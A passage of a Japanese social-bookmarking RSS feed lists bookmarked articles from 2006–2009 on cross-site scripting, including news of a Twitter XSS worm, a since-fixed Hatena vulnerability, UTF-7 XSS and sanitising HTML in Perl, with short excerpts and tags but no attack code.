   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/ruby"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/technology"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/utf-8"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/summarysite"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/rails"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fmxxi.hamachiya.com%2F2006%2F08%2Fxss_1.html&amp;title=XSS%20-%20%E8%A1%A8%E7%A4%BA%E7%B3%BB%E3%83%91%E3%83%A9%E3%83%A1%E3%83%BC%E3%82%BF%E3%81%AB%E5%AD%98%E5%9C%A8%E3%81%99%E3%82%8B%E7%9B%B2%E7%82%B9%20%3A%3A%20%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81">
 <title>XSS - 表示系パラメータに存在する盲点 :: ぼくはまちちゃん！</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fmxxi.hamachiya.com%2F2006%2F08%2Fxss_1.html&amp;title=XSS%20-%20%E8%A1%A8%E7%A4%BA%E7%B3%BB%E3%83%91%E3%83%A9%E3%83%A1%E3%83%BC%E3%82%BF%E3%81%AB%E5%AD%98%E5%9C%A8%E3%81%99%E3%82%8B%E7%9B%B2%E7%82%B9%20%3A%3A%20%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81</link>
 
  
   <description>
     <![CDATA[
       こんにちはこんにちは！！<br />クロスサイトスクリプティングの時間です！<br />XSSというと…！<br />まっさきに思いつくのが、入力データ送信 → 確認表示の部分での無害化漏れですよね！<br />たとえばこんな感じのフォームから受け取ったパラメータを、<br />確認として表示するページとか！
       <a href="http://mxxi.hamachiya.com/2006/08/xss_1.html">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fmxxi.hamachiya.com%2F2006%2F08%2Fxss_1.html&amp;title=XSS%20-%20%E8%A1%A8%E7%A4%BA%E7%B3%BB%E3%83%91%E3%83%A9%E3%83%A1%E3%83%BC%E3%82%BF%E3%81%AB%E5%AD%98%E5%9C%A8%E3%81%99%E3%82%8B%E7%9B%B2%E7%82%B9%20%3A%3A%20%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://mxxi.hamachiya.com/2006/08/xss_1.html</dc:source>
 <dc:identifier>15270</dc:identifier>
 <dc:creator>bookey</dc:creator>
 <dc:date>2006-08-01T22:54:02Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>mixi</dc:subject>
 <dc:subject>hatena</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>computer</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/mixi"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/hatena"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/computer"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Flabs.cybozu.co.jp%2Fblog%2Fakky%2Farchives%2F2006%2F10%2Fgoogle_code_search_hacks.html&amp;title=%E7%A7%8B%E5%85%83%40%E3%82%B5%E3%82%A4%E3%83%9C%E3%82%A6%E3%82%BA%E3%83%A9%E3%83%9C%E3%83%BB%E3%83%97%E3%83%AD%E3%82%B0%E3%83%A9%E3%83%9E%E3%83%BC%E3%83%BB%E3%83%96%E3%83%AD%E3%82%B0%3A%20Google%20Code%20Search%20%E3%81%AE%E3%82%A2%E3%83%AC%E3%81%AA%E6%B4%BB%E7%94%A8%E6%B3%95%E3%81%8C%E7%B6%9A%E3%80%85%E3%81%A8">
 <title>秋元@サイボウズラボ・プログラマー・ブログ: Google Code Search のアレな活用法が続々と</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Flabs.cybozu.co.jp%2Fblog%2Fakky%2Farchives%2F2006%2F10%2Fgoogle_code_search_hacks.html&amp;title=%E7%A7%8B%E5%85%83%40%E3%82%B5%E3%82%A4%E3%83%9C%E3%82%A6%E3%82%BA%E3%83%A9%E3%83%9C%E3%83%BB%E3%83%97%E3%83%AD%E3%82%B0%E3%83%A9%E3%83%9E%E3%83%BC%E3%83%BB%E3%83%96%E3%83%AD%E3%82%B0%3A%20Google%20Code%20Search%20%E3%81%AE%E3%82%A2%E3%83%AC%E3%81%AA%E6%B4%BB%E7%94%A8%E6%B3%95%E3%81%8C%E7%B6%9A%E3%80%85%E3%81%A8</link>
 
  
   <description>
     <![CDATA[
       秋元@サイボウズラボ・プログラマー・ブログ週3日勤務 / MY-SIRNAME@gmail ( 連絡先: 姓@gmail )&laquo; Googleがソースコード検索Google Code Searchを公開 |メイン| 書いたものが物理法則に従い動くホワイトボード(動画) &raquo;2006&#24180;10&#26376;06&#26085;Google Code Search のアレな活用法が続々とGoogleの一般検索でも、社外秘情報の入ったExcelを検索したらいろいろ出てきた(参考 、 公開Webサーバから機密情報を引き出す「Googleハッキング」の脅威と、その対策)といった話もあるし、つい最近はGoogle Calendarで明らかに公開情報じゃないいろんな人の予定が検索できるという指摘も話題になった。ということで、昨日リリースされたGoogleコード検索でも、さっそく色々な「ヤバイ」指摘が。kottke.org では以下のような検索例が圧縮アプリケーションの暗号生成部分のソースパスワードを埋め込んだブログシステムのソースバッファーオーバーフロー脆弱性がありそうなソース公開されるべき...
       <a href="http://labs.cybozu.co.jp/blog/akky/archives/2006/10/google_code_search_hacks.html">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Flabs.cybozu.co.jp%2Fblog%2Fakky%2Farchives%2F2006%2F10%2Fgoogle_code_search_hacks.html&amp;title=%E7%A7%8B%E5%85%83%40%E3%82%B5%E3%82%A4%E3%83%9C%E3%82%A6%E3%82%BA%E3%83%A9%E3%83%9C%E3%83%BB%E3%83%97%E3%83%AD%E3%82%B0%E3%83%A9%E3%83%9E%E3%83%BC%E3%83%BB%E3%83%96%E3%83%AD%E3%82%B0%3A%20Google%20Code%20Search%20%E3%81%AE%E3%82%A2%E3%83%AC%E3%81%AA%E6%B4%BB%E7%94%A8%E6%B3%95%E3%81%8C%E7%B6%9A%E3%80%85%E3%81%A8">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://labs.cybozu.co.jp/blog/akky/archives/2006/10/google_code_search_hacks.html</dc:source>
 <dc:identifier>26606</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2006-10-06T06:35:11Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>google</dc:subject>
 <dc:subject>java</dc:subject>
 <dc:subject>php</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>computer</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>codesearch</dc:subject>
 <dc:subject>sqlinjection</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/google"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/java"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/php"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/computer"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/codesearch"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/sqlinjection"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.itmedia.co.jp%2Fnews%2Farticles%2F0904%2F13%2Fnews029.html&amp;title=%E3%80%8CSamy%E3%80%8D%E3%81%A8%E5%90%8C%E7%A8%AE%E3%81%AE%E3%83%AF%E3%83%BC%E3%83%A0%EF%BC%9ATwitter%E3%80%81XSS%E6%94%BB%E6%92%83%E3%81%AE%E6%A8%99%E7%9A%84%E3%81%AB%20-%20ITmedia%20News">
 <title>「Samy」と同種のワーム：Twitter、XSS攻撃の標的に - ITmedia News</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.itmedia.co.jp%2Fnews%2Farticles%2F0904%2F13%2Fnews029.html&amp;title=%E3%80%8CSamy%E3%80%8D%E3%81%A8%E5%90%8C%E7%A8%AE%E3%81%AE%E3%83%AF%E3%83%BC%E3%83%A0%EF%BC%9ATwitter%E3%80%81XSS%E6%94%BB%E6%92%83%E3%81%AE%E6%A8%99%E7%9A%84%E3%81%AB%20-%20ITmedia%20News</link>
 
  
   <description>
     <![CDATA[
       ニュース「Samy」と同種のワーム：Twitter、XSS攻撃の標的に感染すると「stalkdaily.com」や「Mikeyy」を宣伝するスパムつぶやきを投稿してしまうワームが復活祭の週末に広まった。2009年04月13日 07時49分 更新　マイクロブログサイトの米Twitterは4月12日、1...
       <a href="http://www.itmedia.co.jp/news/articles/0904/13/news029.html">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fwww.itmedia.co.jp%2Fnews%2Farticles%2F0904%2F13%2Fnews029.html&amp;title=%E3%80%8CSamy%E3%80%8D%E3%81%A8%E5%90%8C%E7%A8%AE%E3%81%AE%E3%83%AF%E3%83%BC%E3%83%A0%EF%BC%9ATwitter%E3%80%81XSS%E6%94%BB%E6%92%83%E3%81%AE%E6%A8%99%E7%9A%84%E3%81%AB%20-%20ITmedia%20News">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://www.itmedia.co.jp/news/articles/0904/13/news029.html</dc:source>
 <dc:identifier>823717</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2009-04-13T09:58:13Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>worm</dc:subject>
 <dc:subject>twitter</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/worm"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/twitter"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fskmwin.net%2Farchives%2F002983.html&amp;title=Sukima%20Windows%20Plus%3A%20%E3%80%8C%E4%BA%BA%E5%8A%9B%E6%A4%9C%E7%B4%A2%E3%81%AF%E3%81%A6%E3%81%AA%E3%80%8D%E3%81%AB%E4%BB%BB%E6%84%8F%E3%81%AE%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%88%E3%82%92%E5%AE%9F%E8%A1%8C%E3%81%A7%E3%81%8D%E3%81%A6%E3%81%97%E3%81%BE%E3%81%86%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%8C">
 <title>Sukima Windows Plus: 「人力検索はてな」に任意のスクリプトを実行できてしまう脆弱性が</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fskmwin.net%2Farchives%2F002983.html&amp;title=Sukima%20Windows%20Plus%3A%20%E3%80%8C%E4%BA%BA%E5%8A%9B%E6%A4%9C%E7%B4%A2%E3%81%AF%E3%81%A6%E3%81%AA%E3%80%8D%E3%81%AB%E4%BB%BB%E6%84%8F%E3%81%AE%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%88%E3%82%92%E5%AE%9F%E8%A1%8C%E3%81%A7%E3%81%8D%E3%81%A6%E3%81%97%E3%81%BE%E3%81%86%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%8C</link>
 
  
   <description>
     <![CDATA[
       「教えて厨」のオアシス「人力検索はてな」にて、任意のスクリプトを実行できる脆弱性が発見された模様。<br />と云う訳で、以下の質問ページにその脆弱性を突くどーでも良いスクリプトが実行されております。<br />→お前はもう死んでいる - 人力検索はてな<br />→いいか、お前ら押すなよ！押すな！絶対に押すなよ！殺す気か！ - 人力検索はてな<br />【実行結果】<br /><br /> <br /> <br />余りのくだらなさに吹いてもうた（笑<br />どうやってスクリプトを実行させてるのかは、ワタクシ使った事無いから解らんけど、<br />見た感じ、質問のタイトルに「&lt;script&gt;」とかのタグ名が入れられるんでしょうね、タブン。<br />つーか、個人的にはその程度のサニタイズ対策はされてて当たり前だと思ったんですが、<br />もしかして、もっと凝った事して実行させてるのかな？<br />これ以上は面倒くさいので、誰かが調べてくれるのを待とうっと。<br />【2008/12/11 23:42追記】<br />現在は修正されている模様。<br />上記画像のようなメッセージボックスは出てきませんです。<br />【関連リンク】<br />→人力検索はてな<br />→人力検索はてなの日記 - 機能変更、お知らせなど
       <a href="http://skmwin.net/archives/002983.html">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fskmwin.net%2Farchives%2F002983.html&amp;title=Sukima%20Windows%20Plus%3A%20%E3%80%8C%E4%BA%BA%E5%8A%9B%E6%A4%9C%E7%B4%A2%E3%81%AF%E3%81%A6%E3%81%AA%E3%80%8D%E3%81%AB%E4%BB%BB%E6%84%8F%E3%81%AE%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%88%E3%82%92%E5%AE%9F%E8%A1%8C%E3%81%A7%E3%81%8D%E3%81%A6%E3%81%97%E3%81%BE%E3%81%86%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%8C">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://skmwin.net/archives/002983.html</dc:source>
 <dc:identifier>615310</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2008-12-11T16:27:49Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>人力検索</dc:subject>
 <dc:subject>hatena</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>summarysite</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/%E4%BA%BA%E5%8A%9B%E6%A4%9C%E7%B4%A2"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/hatena"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/summarysite"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FCOLUMN%2F20070419%2F268793%2F&amp;title=%E6%9C%AA%E7%9F%A5%E3%81%AE%E3%81%9C%E3%81%84%E5%BC%B1%E6%80%A7%E3%82%92%E7%99%BA%E8%A6%8B%E3%81%97%E3%81%9F%E3%80%82%E3%81%A9%E3%83%BC%E3%81%99%E3%82%93%E3%81%AE%EF%BC%81%EF%BC%9F%E3%82%AA%E3%83%AC%EF%BC%88%E3%81%9D%E3%81%AE1%EF%BC%89%EF%BC%9AITpro">
 <title>未知のぜい弱性を発見した。どーすんの！？オレ（その1）：ITpro</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FCOLUMN%2F20070419%2F268793%2F&amp;title=%E6%9C%AA%E7%9F%A5%E3%81%AE%E3%81%9C%E3%81%84%E5%BC%B1%E6%80%A7%E3%82%92%E7%99%BA%E8%A6%8B%E3%81%97%E3%81%9F%E3%80%82%E3%81%A9%E3%83%BC%E3%81%99%E3%82%93%E3%81%AE%EF%BC%81%EF%BC%9F%E3%82%AA%E3%83%AC%EF%BC%88%E3%81%9D%E3%81%AE1%EF%BC%89%EF%BC%9AITpro</link>
 
  
   <description>
     <![CDATA[
       <br /><br />セキュリティ・ホール＆ウイルスCSIRTフォーラムWebの脅威 <br />　ITpro ＞ セキュリティITproの最新ニュースを<br />RSSで配信しています『Windows Server 2008』の<br />最新技術，管理/活用情報はこちら<br />Jamesのセキュリティ徒然草<br />未知のぜい弱性を発見した。どーすんの！？オレ（その1...
       <a href="http://itpro.nikkeibp.co.jp/article/COLUMN/20070419/268793/">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FCOLUMN%2F20070419%2F268793%2F&amp;title=%E6%9C%AA%E7%9F%A5%E3%81%AE%E3%81%9C%E3%81%84%E5%BC%B1%E6%80%A7%E3%82%92%E7%99%BA%E8%A6%8B%E3%81%97%E3%81%9F%E3%80%82%E3%81%A9%E3%83%BC%E3%81%99%E3%82%93%E3%81%AE%EF%BC%81%EF%BC%9F%E3%82%AA%E3%83%AC%EF%BC%88%E3%81%9D%E3%81%AE1%EF%BC%89%EF%BC%9AITpro">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://itpro.nikkeibp.co.jp/article/COLUMN/20070419/268793/</dc:source>
 <dc:identifier>73498</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2007-04-20T01:37:51Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>life</dc:subject>
 <dc:subject>computer</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>report</dc:subject>
 <dc:subject>utf-7</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/life"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/computer"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/report"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/utf-7"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2Fantipop%2F20070804%2F1186154750&amp;title=antipop%20-%20HTML%3A%3AStripScripts%E3%81%A7XSS%E5%AF%BE%E7%AD%96%E3%82%92%E3%81%99%E3%82%8B">
 <title>antipop - HTML::StripScriptsでXSS対策をする</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2Fantipop%2F20070804%2F1186154750&amp;title=antipop%20-%20HTML%3A%3AStripScripts%E3%81%A7XSS%E5%AF%BE%E7%AD%96%E3%82%92%E3%81%99%E3%82%8B</link>
 
  
   <description>
     <![CDATA[
       antipopHomeProfileArchives &lt;Hatena::Star::Questionnaire: ... | [アイドル] ハロプロ楽曲大賞199...&gt;2007-08-04 HTML::StripScriptsでXSS対策をするPerl, セキュリティ先日公開した「はて☆すたアンケート」にて、アンケートの説明文をはてな記法で書けるよう、機能追加を行った。その際、Template::Plugin::Hatenaを用いた。これは、はてな記法パーサであるText::Hatena（正確には、そのヴァージョン0.16以下）を、Template::Toolkitのプラグインとして使えるようにしたものである。はてな記法は、それ自体で全ての文書構造を表現できる、あるいは、はてなダイアリのシステム自体は、はてな記法のみしか許容しないというものではなく、たとえば画像を貼る際には、普通にimg要素を書く必要があるし、また、その他の要素についても、記法が用意されていないものについては、「はてなダイアリーのヘルプ - はてなダイアリー利用可能タグ」に掲載されているものに限り、自分でタグを書くことができる。...
       <a href="http://d.hatena.ne.jp/antipop/20070804/1186154750">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fd.hatena.ne.jp%2Fantipop%2F20070804%2F1186154750&amp;title=antipop%20-%20HTML%3A%3AStripScripts%E3%81%A7XSS%E5%AF%BE%E7%AD%96%E3%82%92%E3%81%99%E3%82%8B">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://d.hatena.ne.jp/antipop/20070804/1186154750</dc:source>
 <dc:identifier>117836</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2007-08-07T05:31:00Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>programming</dc:subject>
 <dc:subject>perl</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>computer</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/programming"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/perl"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/computer"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fit.nikkei.co.jp%2Fsecurity%2Fnews%2Findex.aspx%3Fn%3DMMIT2g000021082008&amp;title=%E3%81%A4%E3%81%84%E3%81%AB%E8%B5%B7%E3%81%8D%E3%81%9F%EF%BC%B8%EF%BC%B3%EF%BC%B3%E6%94%BB%E6%92%83%E3%83%BB%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%BC%E3%81%AF%EF%BC%91%E6%97%A5%E3%81%AB%E3%81%97%E3%81%A6%E3%81%AA%E3%82%89%E3%81%9A%20%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%BC-%E6%9C%80%E6%96%B0%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%3AIT-PLUS">
 <title>ついに起きたＸＳＳ攻撃・セキュリティーは１日にしてならず セキュリティー-最新ニュース:IT-PLUS</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fit.nikkei.co.jp%2Fsecurity%2Fnews%2Findex.aspx%3Fn%3DMMIT2g000021082008&amp;title=%E3%81%A4%E3%81%84%E3%81%AB%E8%B5%B7%E3%81%8D%E3%81%9F%EF%BC%B8%EF%BC%B3%EF%BC%B3%E6%94%BB%E6%92%83%E3%83%BB%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%BC%E3%81%AF%EF%BC%91%E6%97%A5%E3%81%AB%E3%81%97%E3%81%A6%E3%81%AA%E3%82%89%E3%81%9A%20%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%BC-%E6%9C%80%E6%96%B0%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%3AIT-PLUS</link>
 
  
   <description>
     <![CDATA[
       ITプラス ビジネスを制する人のIT総合ニュースサイト音声ブラウザ専用。こちらよりメインメニューへ移動可能です。クリック。音声ブラウザ専用。こちらより記事見出しへ移動可能です。クリック。音声ブラウザ専用。こちらより見出し一覧へ移動可能です。クリック。            サイトマップ   利用案内  RSSについて  NIKKEI NETトップへ戻る       ネットナビ  新聞購読のお申し込み                                    ビジネスセキュリティーデジタル家電&エンタメトレンド ウイルス・ネット犯罪安全対策個人情報発表資料連載・コラム特集更新：8月21日 13:08セキュリティー：最新ニュースついに起きたＸＳＳ攻撃・セキュリティーは１日にしてならず　セキュリティーといえば情報保護のことだと思っている人も多い。つまり、個人情報やカード情報などを大量に管理するサイトの管理者が考えればいいことであり、一般のサイト管理者はそこまで意識する必要はないのではと考えていると思う。しかし、どんなサイトであっても、セキュリティー上の不備が問題となる事件は起こりうる。■「予告.in」で...
       <a href="http://it.nikkei.co.jp/security/news/index.aspx?n=MMIT2g000021082008">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fit.nikkei.co.jp%2Fsecurity%2Fnews%2Findex.aspx%3Fn%3DMMIT2g000021082008&amp;title=%E3%81%A4%E3%81%84%E3%81%AB%E8%B5%B7%E3%81%8D%E3%81%9F%EF%BC%B8%EF%BC%B3%EF%BC%B3%E6%94%BB%E6%92%83%E3%83%BB%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%BC%E3%81%AF%EF%BC%91%E6%97%A5%E3%81%AB%E3%81%97%E3%81%A6%E3%81%AA%E3%82%89%E3%81%9A%20%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%BC-%E6%9C%80%E6%96%B0%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%3AIT-PLUS">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://it.nikkei.co.jp/security/news/index.aspx?n=MMIT2g000021082008</dc:source>
 <dc:identifier>440441</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2008-08-21T06:02:39Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>web</dc:subject>
 <dc:subject>csrf</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>summarysite</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/web"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/csrf"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/summarysite"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fgihyo.jp%2Fadmin%2Fserial%2F01%2Fcharcode%2F0001&amp;title=%E6%9C%AC%E5%BD%93%E3%81%AF%E6%80%96%E3%81%84%E6%96%87%E5%AD%97%E3%82%B3%E3%83%BC%E3%83%89%E3%81%AE%E8%A9%B1%EF%BC%9A%E7%AC%AC1%E5%9B%9E%E3%80%80UTF-7%E3%81%AB%E3%82%88%E3%82%8B%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E6%94%BB%E6%92%83%EF%BC%BB%E5%89%8D%E7%B7%A8%EF%BC%BD%EF%BD%9Cgihyo.jp%20%E2%80%A6%20%E6%8A%80%E8%A1%93%E8%A9%95%E8%AB%96%E7%A4%BE">
 <title>本当は怖い文字コードの話：第1回　UTF-7によるクロスサイトスクリプティング攻撃［前編］｜gihyo.jp … 技術評論社</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fgihyo.jp%2Fadmin%2Fserial%2F01%2Fcharcode%2F0001&amp;title=%E6%9C%AC%E5%BD%93%E3%81%AF%E6%80%96%E3%81%84%E6%96%87%E5%AD%97%E3%82%B3%E3%83%BC%E3%83%89%E3%81%AE%E8%A9%B1%EF%BC%9A%E7%AC%AC1%E5%9B%9E%E3%80%80UTF-7%E3%81%AB%E3%82%88%E3%82%8B%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E6%94%BB%E6%92%83%EF%BC%BB%E5%89%8D%E7%B7%A8%EF%BC%BD%EF%BD%9Cgihyo.jp%20%E2%80%A6%20%E6%8A%80%E8%A1%93%E8%A9%95%E8%AB%96%E7%A4%BE</link>
 
  
   <description>
     <![CDATA[
